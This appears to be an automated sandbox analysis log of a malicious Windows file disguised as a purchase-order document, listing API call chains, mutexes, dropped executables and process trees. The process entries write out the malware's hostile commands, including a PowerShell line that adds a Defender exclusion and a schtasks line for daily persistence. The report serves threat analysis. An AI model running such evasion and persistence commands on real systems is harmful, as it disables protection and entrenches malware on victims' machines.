Source: alg.exe.4.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: GoogleUpdateComRegisterShell64.exe.4.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: GoogleUpdateCore.exe.4.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AppVClient.exe.4.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: elevation_service.exe.4.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: elevation_service.exe0.4.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: GoogleUpdateOnDemand.exe.4.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: 117.0.5938.132_chrome_installer.exe.4.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: jabswitch.exe.4.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Source: Native_Redline_BTC.exe.3.dr

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: Native_Redline_BTC.exe.3.dr, WP6RZJql8gZrNhVA9v.cs	Cryptographic APIs: 'CreateDecryptor'
Source: Native_Redline_BTC.exe.3.dr, WP6RZJql8gZrNhVA9v.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 3.2.svchost.exe.6800000.3.raw.unpack, WP6RZJql8gZrNhVA9v.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 3.2.svchost.exe.6800000.3.raw.unpack, WP6RZJql8gZrNhVA9v.cs	Cryptographic APIs: 'CreateDecryptor'

Source: classification engine

Classification label: mal100.spre.troj.spyw.expl.evad.winEXE@49/171@89/20

Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe

Code function: 0_2_0044AF5C GetLastError,FormatMessageW,

0_2_0044AF5C

Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe	Code function: 0_2_00464422 OpenProcess,GetLastError,GetLastError,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,OpenProcess,AdjustTokenPrivileges,CloseHandle,TerminateProcess,GetLastError,CloseHandle,	0_2_00464422
Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe	Code function: 0_2_004364AA GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,	0_2_004364AA
Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe	Code function: 2_2_00464422 OpenProcess,GetLastError,GetLastError,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,OpenProcess,AdjustTokenPrivileges,CloseHandle,TerminateProcess,GetLastError,CloseHandle,	2_2_00464422
Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe	Code function: 2_2_004364AA GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,	2_2_004364AA

Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe

Code function: 0_2_0045D517 SetErrorMode,GetDiskFreeSpaceW,GetLastError,SetErrorMode,

0_2_0045D517

Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe

Code function: 0_2_0043701F CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,__wcsicoll,CloseHandle,

0_2_0043701F

Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe

Code function: 0_2_0047A999 OleInitialize,CLSIDFromProgID,CoCreateInstance,CoInitializeSecurity,_memset,_wcslen,_memset,CoCreateInstanceEx,CoSetProxyBlanket,

0_2_0047A999

Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe

Code function: 0_2_0043614F __swprintf,__swprintf,__wcsicoll,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx,

0_2_0043614F

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 3_2_052ACBD0 StrStrIW,CloseHandle,StrStrIW,CloseServiceHandle,OpenServiceW,StrStrIW,_wcslen,ChangeServiceConfigW,StrStrIW,StrStrIW,CloseServiceHandle,CloseHandle,StartServiceW,

3_2_052ACBD0

Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe

File created: C:\Program Files (x86)\Mozilla Maintenance Service\logs\maintenanceservice.log

Source: C:\Windows\SysWOW64\svchost.exe

File created: C:\Users\user\AppData\Roaming\76fb15a314ced2a4.bin

Jump to behavior

Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7568:120:WilError_03
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Mutant created: \Sessions\1\BaseNamedObjects\kbedaSzAAOYDRDgN
Source: C:\Windows\SysWOW64\svchost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-76fb15a314ced2a47d8e3ee9-b
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7424:120:WilError_03
Source: C:\Windows\SysWOW64\svchost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-76fb15a314ced2a4-inf
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7404:120:WilError_03
Source: C:\Windows\System32\alg.exe	Mutant created: \BaseNamedObjects\Global\Multiarch.m0yv-76fb15a314ced2a49ea72c54-b

Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe

File created: C:\Users\user\AppData\Local\Temp\anaboly

Jump to behavior

Source: RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\build.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
Source: C:\Users\user\AppData\Local\Temp\build.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\build.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\build.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process

Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe

ReversingLabs: Detection: 50%

Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe

File read: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe

Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe

Evasive API call chain: __getmainargs,DecisionNodes,exit

Source: unknown	Process created: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe "C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe"
Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe"
Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe	Process created: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe "C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe"
Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe"
Source: C:\Windows\SysWOW64\svchost.exe	Process created: C:\Users\user\AppData\Local\Temp\microsofts.exe "C:\Users\user\AppData\Local\Temp\microsofts.exe"
Source: C:\Windows\SysWOW64\svchost.exe	Process created: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe "C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe"
Source: unknown	Process created: C:\Windows\System32\alg.exe C:\Windows\System32\alg.exe
Source: unknown	Process created: C:\Windows\System32\AppVClient.exe C:\Windows\system32\AppVClient.exe
Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe	Process created: C:\Users\user\AppData\Local\Temp\build.exe "C:\Users\user\AppData\Local\Temp\build.exe"
Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe	Process created: C:\Users\user\AppData\Local\Temp\server_BTC.exe "C:\Users\user\AppData\Local\Temp\server_BTC.exe"
Source: unknown	Process created: C:\Windows\System32\FXSSVC.exe C:\Windows\system32\fxssvc.exe
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 12:46 /du 23:59 /sc daily /ri 1 /f
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process created: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe"
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpE6E4.tmp.cmd""
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout 6
Source: unknown	Process created: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: unknown	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe"
Source: unknown	Process created: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe "C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe"
Source: unknown	Process created: C:\Windows\System32\msdtc.exe C:\Windows\System32\msdtc.exe
Source: unknown	Process created: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe C:\Windows\system32\PerceptionSimulation\PerceptionSimulationService.exe
Source: unknown	Process created: C:\Windows\SysWOW64\perfhost.exe C:\Windows\SysWow64\perfhost.exe
Source: unknown	Process created: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe"
Source: unknown	Process created: C:\Windows\System32\Locator.exe C:\Windows\system32\locator.exe
Source: unknown	Process created: C:\Windows\System32\SensorDataService.exe C:\Windows\System32\SensorDataService.exe
Source: unknown	Process created: C:\Windows\System32\snmptrap.exe C:\Windows\System32\snmptrap.exe
Source: unknown	Process created: C:\Windows\System32\Spectrum.exe C:\Windows\system32\spectrum.exe
Source: unknown	Process created: C:\Windows\System32\OpenSSH\ssh-agent.exe C:\Windows\System32\OpenSSH\ssh-agent.exe
Source: unknown	Process created: C:\Windows\System32\TieringEngineService.exe C:\Windows\system32\TieringEngineService.exe
Source: unknown	Process created: C:\Windows\System32\AgentService.exe C:\Windows\system32\AgentService.exe
Source: unknown	Process created: C:\Windows\System32\vds.exe C:\Windows\System32\vds.exe
Source: unknown	Process created: C:\Windows\System32\wbengine.exe "C:\Windows\system32\wbengine.exe"
Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe"	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe	Process created: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe "C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe"	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process created: C:\Users\user\AppData\Local\Temp\microsofts.exe "C:\Users\user\AppData\Local\Temp\microsofts.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process created: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe "C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe	Process created: C:\Users\user\AppData\Local\Temp\build.exe "C:\Users\user\AppData\Local\Temp\build.exe"
Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe	Process created: C:\Users\user\AppData\Local\Temp\server_BTC.exe "C:\Users\user\AppData\Local\Temp\server_BTC.exe"
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 12:46 /du 23:59 /sc daily /ri 1 /f
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process created: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe"
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpE6E4.tmp.cmd""
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout 6

Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Section loaded: edputil.dll	Jump to behavior
